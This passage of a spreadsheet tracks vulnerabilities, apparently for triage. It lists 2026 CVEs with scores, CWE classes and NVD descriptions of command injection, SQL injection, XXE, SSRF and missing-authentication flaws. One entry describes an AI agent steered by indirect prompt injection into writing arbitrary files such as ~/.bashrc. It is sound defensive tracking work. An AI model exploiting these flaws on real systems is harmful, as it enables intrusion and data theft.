        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr"/>
      <c r="Q274" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>LibreNMS is a network monitoring system. In versions from 21.6.0 up to 26.5.0, the Signal alert transport is vulnerable to command injection because the signal-cli path and the Recipient field of an alert transport entry are insufficiently escaped before being passed to an exec call. An authenticated administrator can craft a transport entry whose Recipient contains shell metacharacters and whose path points to the bundled composer_wrapper.php script, which itself passes attacker-controlled input to further unsafe exec calls. By chaining these calls, the administrator can execute arbitrary operating-system commands on the LibreNMS host. This issue is fixed in version 26.5.0.</t>
        </is>
      </c>
      <c r="S274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55182</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55534</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr"/>
      <c r="Q275" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. From praisonai 4.6.34 until 4.6.58, praisonai serve agents accepts --api-key but _create_agents_app() does not authenticate POST /agents or POST /agents/{agent_name}. A network caller can invoke configured agents without credentials even when an API key was supplied. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55534</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55539</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr"/>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr"/>
      <c r="Q276" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.51, the Jobs API create_app function mounts /api/v1/runs without authentication. Any reachable caller can submit jobs, read results, cancel runs, or delete jobs using operator credentials. The fix adds PRAISONAI_JOBS_API_KEY middleware for Authorization or X-API-Key. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55539</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55557</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr"/>
      <c r="Q277" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>browse-mcp is a Playwright-based headless-browser MCP server for MCP-capable agents. Prior to 0.8.2, browser_download writes a fetched response body to join(save_dir, filename) without validating the caller-controlled save_dir, while browser_save_state and browser_load_state honor a caller-controlled path unchanged. A malicious MCP client, or an autonomous agent steered by indirect prompt injection on a visited page, can choose an arbitrary save_dir or state path and a URL whose response body becomes attacker-controlled file contents, allowing writes to any path the process can reach, including ~/.bashrc, autostart entries, or cron files, and potentially leading to host code execution. The force_fetch fallback also uses a raw fetch() that bypasses the BROWSE_MCP_ALLOWED_ORIGINS origin fence. This issue is fixed in version 0.8.2.</t>
        </is>
      </c>
      <c r="S277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55557</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55580</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr"/>
      <c r="Q278" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, config.go initializes Security.Enabled to false, and when MCP_SHELL_SEC_CONFIG_FILE is unset, main.go starts the documented bare-binary deployment without a security policy. SecurityValidator.validateCommand in security.go then short-circuits and allows every command supplied to the shell_exec MCP tool, so an LLM connected over stdio can execute unrestricted OS commands as the mcp-shell process user. The README from-source installation and MCP client configuration omit MCP_SHELL_SEC_CONFIG_FILE, making the insecure state the documented default. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="S278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55580</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55848</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr"/>
      <c r="Q279" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>mapfish-print is a component of MapFish for printing templated cartographic maps. Prior to 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5, MapFish Print accepts an attacker-controlled GML layer url in requests to the /api/print3/print endpoint and fetches XML parsed by core/src/main/java/org/mapfish/print/map/geotools/GmlLayer.java without disabling external entities and external DTDs. A remote XML document and DTD can expand a local file entity, and the resulting content can be exposed through the GML parsing and error path. This allows unauthenticated attackers to read files such as operating-system account data, Kubernetes service-account tokens, and certificates. Replacing the file entity target with an internal HTTP endpoint also permits server-side request forgery. This issue is fixed in versions 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5.</t>
        </is>
      </c>
      <c r="S279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55848</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63219</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr"/>
      <c r="Q280" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>GeoNetwork is a catalog application to manage spatially referenced resources. Prior to versions 4.4.12 and 4.2.17, the API endpoint for creating a new formatter via file upload is unprotected and allows the upload of external uncontrolled files. An unauthenticated attacker can upload arbitrary `.xsl` or `.zip` formatter files to the server.  An unauthenticated attacker can write arbitrary files into the GeoNetwork formatter directory. On its own this constitutes unauthorized write access to server storage. The issue is patched in GeoNetwork versions 4.4.12 and 4.2.17.</t>
        </is>
      </c>
      <c r="S280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63219</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77775</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr"/>
      <c r="Q281" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>Headroom's LLM proxy lets a client choose the upstream destination with the x-headroom-base-url request header. _resolve_openai_upstream_base in headroom/proxy/handlers/openai.py accepts the header value, requires only that it parse with an http or https scheme and a hostname, and returns it for use as the upstream base; _select_passthrough_base_url in headroom/providers/proxy_routes.py reads the same header for the passthrough routes. No check rejects loopback, link-local, or RFC 1918 destinations, and because the component is a proxy the upstream response is returned to the caller, so the request reaches internal services and cloud metadata addresses and their responses are disclosed. The Authorization header accompanying the request is forwarded unchanged to the caller-designated host. The pip console script binds 127.0.0.1 by default, but the reference docker-compose.yml ships --host 0.0.0.0 with published ports and no required HEADROOM_PROXY_TOKEN, which the server itself warns about at startup, so a deployment following the shipped compose exposes the affected data-plane routes to the network without authentication.</t>
        </is>
      </c>
      <c r="S281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77775</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79322</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr"/>
      <c r="K282" s="5" t="inlineStr">
        <is>
          <t>mageplaza:mageplaza_blog</t>
        </is>
      </c>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr"/>
      <c r="Q282" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>SQL injection in the RelatedProduct block in Mageplaza Blog for Magento 2 (mageplaza/magento-2-blog-extension) through 4.3.2 allows remote unauthenticated attackers to execute arbitrary SQL commands and read arbitrary database contents via the id parameter to /mpblog/post/view.</t>
        </is>
      </c>
      <c r="S282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79322</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80214</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>ab69c47f-b95e-4bf2-b2d9-4b1fd1b24b4a</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr"/>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr"/>
      <c r="Q283" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>LibreNMS’s Virtualization Discovery module is vulnerable to command line injection. An authenticated admin user can execute arbitrary code on the host server.</t>
        </is>
      </c>
      <c r="S283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80214</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8044</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@se.com</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr"/>
      <c r="Q284" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability exists that could cause remote code execution by an attacker with a privileged account when malicious arguments are provided as backup configuration parameters.</t>
        </is>
      </c>
      <c r="S284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8044</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81889</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr"/>
      <c r="Q285" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.70, elFinder URL uploads in php/elFinder.class.php can bypass server-side request forgery protections when PHP cURL is unavailable because validate_address() validates $info['ip'], but get_remote_contents() selects fsock_get_contents(), which connects to $arr['host'] and performs a second DNS resolution. An attacker able to submit a URL upload can use DNS rebinding to have the first resolution return a public address and the connection resolution return a loopback or private address, causing the internal HTTP response body to be stored as an uploaded file and made readable through elFinder. After a successful fetch, get_headers($url, true) separately requests the original hostname without reusing the validated and pinned connection, creating an additional blind server-side request forgery path even when curl_get_contents() is selected. This issue is fixed in version 2.1.70.</t>
        </is>
      </c>
      <c r="S285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81889</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84068</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr"/>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr"/>
      <c r="Q286" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>The Quentn WP WordPress plugin before 1.2.15 does not adequately escape a request parameter before using it in an unprepared SQL query, allowing unauthenticated attackers to extract arbitrary data from the database via SQL injection.</t>
        </is>
      </c>
      <c r="S286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84068</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86762</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr"/>
      <c r="K287" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr"/>
      <c r="Q287" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 does not apply the CheckUserIsActivated middleware to the `api` middleware group in app/Http/Kernel.php, and deactivating a user does not revoke that user's Passport personal access tokens. As a result, although a deactivated account is correctly refused at web login, its existing API token continues to authenticate and to grant read and write access to the REST API (assets, users, licenses, etc.) at the account's prior permission level until the token expires. A deactivated account that retains user-management permissions can re-activate itself through the API, permanently defeating the deactivation control.</t>
        </is>
      </c>
      <c r="S287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86762</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86770</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr"/>
      <c r="K288" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr"/>
      <c r="Q288" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to validate username case sensitivity during SAML authentication, allowing attackers to authenticate as different users by registering IdP accounts with accent or case variants of victim usernames. Attackers can exploit the default utf8mb4_unicode_ci database collation to bypass username matching and achieve account takeover through federated login paths including SAML, LDAP, and OAuth.</t>
        </is>
      </c>
      <c r="S288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86770</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87633</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr"/>
      <c r="K289" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr"/>
      <c r="Q289" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>Use after free in Views in Google Chrome prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via UI Interaction. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S289" s="6" t="inlineStr">
        <is>
